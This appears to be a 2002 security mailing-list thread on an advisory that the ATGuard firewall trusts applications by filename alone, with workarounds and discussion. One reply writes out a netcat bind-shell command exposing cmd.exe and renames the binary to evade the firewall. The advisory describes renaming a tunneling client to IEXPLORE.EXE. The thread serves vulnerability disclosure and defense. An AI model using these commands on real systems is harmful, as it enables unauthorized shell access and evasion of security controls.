Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
As far as i see the article you gave me at tooleaky.zensoft.com mostly deals with outbound connections. The ATGuard-Problem still goes futher, it is also a problem with inbound connections. I use a Xitami Webserver on Port 50080 for testing purposes. This Xitami Webserver is (currently) allowed to accept all connections on all ports (this is also a configuration problem, but most people just allow inbound connections from any address to any port for an application). So, i just did the following: I:\cd netcat I:\netcatnc -e c:\winnt\system32\cmd.exe -p 500 -l I tried to connect to port 500 with telnet: ATGuard fires up as it is supposed to. So, now i did the following: I:\netcatcopy nc.exe xiwin32.exe 1 Datei(en) kopiert. (Translation for the curious non-german readers : 1 File copied :) I:\netcatxiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l Trying it with telnet again, i got a very nice shell without any notice from ATGuard. That's why i mentioned also trojan horses in my Advisories - just renaming your trojan horse to the name of a program that is allowed to accept inbound connections will do the trick. There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you. Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions. Also, you perhaps will think that your personal firewall is perfectly safe while it isn't. Best regards, --- BlueScreen / Florian Hobelsberger (UIN: 101782087) Member of: www.IT-Checkpoint.net www.Hackeinsteiger.de www.DvLdW.de == To encrypt classified messages, please download and use this PGP-Key: http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt ==
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
Hi, Ye Olde Disclaimer: The information contained in this email is believed to be true. However, exhaustive regression testing has not been performed. No guarantees or warranties are implicitly or explicitly granted. Use the information within at your own risk. Tested AtGuard version: 3.21.05 Tested OS's: NT4 SP6a, Win95 (don't hit me, I'm cheap) BlueScreen wrote: - itcp advisory 13 [EMAIL PROTECTED] http://www.it-checkpoint.net/advisory/12.html April 29th, 2002 - ITCP Advisory 13: Bypassing of ATGuard Firewall possible - - *snip* DETAILS *snip* Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be much better), to determine wether the executed program is real the one, that is allowed to connect to all hosts on port 80. It just uses the filename (in this case IEXPLORE.EXE). Only if you've created your rule in interactive learning mode. See discussion below. *snip* SOLUTION There doesn't exist an solution, since ATGuard is not developped anymore. We were not able to test the Norton Personal Firewall for this problem, since no one of us owns it. We are contacting Norton directly with this Advisory. Not quite correct. The bug reported in BlueScreen's advisory does exist. However, either the method of testing was incomplete, or the report was incomplete. Also, there is a workaround. AtGuard has the ability to create firewall rules on the fly (in it's interactive learning mode). When a connection is attempted and AtGuard cannot find a matching rule, in interactive learning mode the user is presented with a window containing four options. Two of those options allow the user to specify whether the connection should be allowed or blocked, this one time only. The other two of those options allow the user to create a rule for particular connections (that may either block or allow the connections). This works on either incoming or outgoing connections. When a rule is created in interactive learning mode, *only the application executable name* is stored in the rulebase. This is the bug that BlueScreen pointed out. Without a path to the application file in the rulebase, any application with a similar name can make use of the firewall rule (block or allow, as the case may be). However, AtGuard also allows the user to create their own firewall rules manually. Click on the dashboard or tray icon, and launch the Settings menu item. Click the Add button, create a rule, and make sure you specify an application that the rule applies to (on the Application tab, click Application Shown Above, click the Browse button, and specify the proper application with the File Dialog box). You will find the full path to the file specified in the rule. Shut down your machine, and start it up again, and you'll find the full path still there. You can verify the full path in the registry under the key: HKEY_LOCAL_MACHINE\SOFTWARE\WRQ\IAM\FirewallObjects\Applications Workaround: Manually create firewall rules instead of using interactive learning mode to create rules. If you do use interactive learning mode, you should reopen the Settings menu, and manually adjust the Application Shown Above so it shows the full path to the application that the rule applies to (you apparently don't have to trash all your current rules). This *appears* to resolve the issue (from my brief testing, YMMV). Of course, this still wouldn't prevent someone from replacing the specified file with malware. However, if you're machine has been compromised to that level, it seems to me you've got more to worry about than a few firewall rules :/ It should be noted that AtGuard rules may be created that allow or block access to *all* applications. Such rules appear to not be affected by this bug. ADDITIONAL INFORMATION Vendor has not been contacted. (since he doesn't exist anymore). Actually, the original vendor does exist: http://www.wrq.com. They simply don't sell the product any more. From what I can tell, the original firewall has been sufficiently morphed by Symantec so that it no longer has much resemblance to AtGuard. Thus, I don't think comparisons between products from these two vendors are fair or valid. -UMus B. KidN
AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
Most products use checksums to detect replaced or modified applications. But there are other problems with outbound filters. Most personal firewalls do not detect if a malicious program uses a 'trusted' application to transmit data (look at tooleaky.zensoft.com). I have tested several products with a method similar to Bob Sundling's and only BlackICE PC Protection 3.5 stopped communication (Norton PF, Tiny PF and ZoneAlarm did not stop it). There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you. Jonas
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
BlueScreen in 014401c1ef8d$1bb66510$0100a8c0@BlueScreenPrimary: ATGuard can be fooled to think that a disallowed program is allowed to connect to the internet. This is a well known problem and has been discussed at length on http://grc.com/lt/scoreboard.htm. A.M Janssen has written utility which monitors the hashes (SHA1, Ripe MD-160 or Haval) for the applications in AtGuard's ruleset http://www.capimonitor.nl/nisfilecheck11.zip. It has to be separately scheduled so it's not as good as real time checks by the firewall but very useful nonetheless.
ITCP Advisory 13: Bypassing of ATGuard Firewall possible
- itcp advisory 13 [EMAIL PROTECTED] http://www.it-checkpoint.net/advisory/12.html April 29th, 2002 - ITCP Advisory 13: Bypassing of ATGuard Firewall possible - - Affected programs: ATGuard Personal Firewall (At least Version 3.2, probably others) URL: Not existant any more, the software is still wide spread Vendor: The ATGuard-Technology was bought by Norton and included in it's Norton Personal Firewall Vulnerability-Class: Bypassing of a personal Firewall (Desktop Firewall) OS specific: Windows Problem-Type: local and remote SUMMARY ATGuard is a very good personal desktop firewall, which comes with a wide range of possibilities: - Firewall functions - Webfilter functions - Privacy protection functions It is also possible, to allow specific connections bound to applications (for example, you can allow all connections to Port 80 on any host for Internet Explorer). Futher, it is possible to protect the firewall configuration (and start stop of it) with a password. This could be a great possibility, to control the activities of children and youths in the internet. DETAILS As mentioned before, it is possible to allow for specific applications specific connections. For example, most users use Internet Explorer to browse the internet. It is a logical assumption, that people using the Internet Explorer to browse the WWW allow outbound connections to all hosts at least to the destination port 80. Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be much better), to determine wether the executed program is real the one, that is allowed to connect to all hosts on port 80. It just uses the filename (in this case IEXPLORE.EXE). IMPACT ATGuard can be fooled to think that a disallowed program is allowed to connect to the internet. Trojan horses which use outbound connections or using HTTP-Tunneling-Software to tunnel unwanted connections (like ICQ) are not blocked. EXPLOIT There are many different possibilities to exploit this. This is a sample how to get ICQ working on a computer, on which only Internet Explorer is allowed to connect to port 80. All other outbound connections are blocked by ATGuard. Download the HTTP-Tunnel-Client from www.HTTP-Tunnel.com. Install it to your computer. When you try to configure it, it will tell you, that it can't find the HTTP-Tunnel-Server. Now, just rename / copy the File HTTP-Tunnel Client.exe to IEXPLORE.EXE. Fire it up again using the IEXPLORE.EXE-Filename. After short time it should tell you, that it is working correctly. As said before, it is possible to use trojan horses to fool bad configured firewalls, etc... SOLUTION There doesn't exist an solution, since ATGuard is not developped anymore. We were not able to test the Norton Personal Firewall for this problem, since no one of us owns it. We are contacting Norton directly with this Advisory. ADDITIONAL INFORMATION Vendor has not been contacted. (since he doesn't exist anymore). Since there exist more personal firewalls like ATGuard, we will have a look at the free ones and try the same. Bugs discovered and published by Florian BlueScreen Hobelsberger [EMAIL PROTECTED] ) from www.IT-Checkpoint.net --- DISCLAIMER: The information in this bulletin is provided AS IS without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.